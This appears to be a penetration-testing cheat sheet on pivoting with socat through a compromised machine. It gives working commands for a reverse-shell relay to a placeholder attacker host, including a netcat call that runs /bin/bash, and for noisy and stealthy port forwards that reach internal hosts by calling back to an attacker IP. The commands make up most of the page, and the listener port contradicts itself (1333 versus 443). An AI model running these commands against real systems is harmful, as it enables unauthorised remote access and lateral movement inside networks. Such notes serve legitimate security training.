# Socat

## Overview

**Socat** can be used create port forwards and relays.

For example if you are attempting to get a shell on a target that does not have a direct connection back to your attacking computer, you could use **socat** to set up a relay on the currently compromised machine. This listens for the reverse shell from the target and then forwards it immediately back to the attacking box.

## Reverse Shell Relay with Socat

First download the **socat** binary ([Linux ](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat)/ [Windows](https://sourceforge.net/projects/unix-utils/files/socat/1.7.3.2/socat-1.7.3.2-1-x86_64.zip/download)) to the target machine.

Start nc listener on your machine on 1333

Start the socat relay on the **target machine**

```bash
./socat tcp-l:8000 tcp:ATTACKING_IP:1333 &
```

* **tcp-l:8000** &#x20;
  * used to create the first half of the connection -- an IPv4 listener on tcp port 8000 of the target machine.
* **tcp:ATTACKING\_IP:443**&#x20;
  * connects back to our local IP on port 443. The ATTACKING\_IP obviously needs to be filled in correctly for this to work

From here we can create a new reverse shell back to the attacking machine on the **targets** local 8000 port

```bash
./nc-adot8 127.0.0.1 8000 -e /bin/bash
```

## Port Forwarding - Noisy

You can set up a port forward with socat by opening up up a listening port on the compromised server, and redirecting whatever comes into it to the target server

For example, if the compromised server is 172.16.0.5 and the target is port 3306 of 172.16.0.10, we could use the following command on the compromised server.

```bash
./socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306 &
```

* **fork**&#x20;
  * used to put every connection into a new process
* **reusedaddr**
  * makes the port stay open after a connection is made to it

We can now connect to port 33060 on the compromised server (172.16.0.5) and have our traffic **relayed** to our intended target **172.16.0.10:3306.**

## Port Forwarding - Quiet

The first method could be picked up by any kind of host or network scanning because it's literally opening up an external port (not stealthy at all).

First we need to open up ports 8001 and 8000 on our **attacking machine** to create a local port relay. What goes into one of them comes out of the other.

```bash
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
```

Next on the compromised server we run this to create a link between port 8000 on our **attacking machine**, and port **80** on the i**ntended target (172.16.0.10)**

This will allow us to go to **localhost:8000** on our attacking machine's web browser to load the webpage served by the target: **172.16.0.10:80**

```bash
./socat tcp:ATTACKING_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork &
./socat tcp:10.50.73.2:8001 tcp:172.16.0.10:80,fork &
```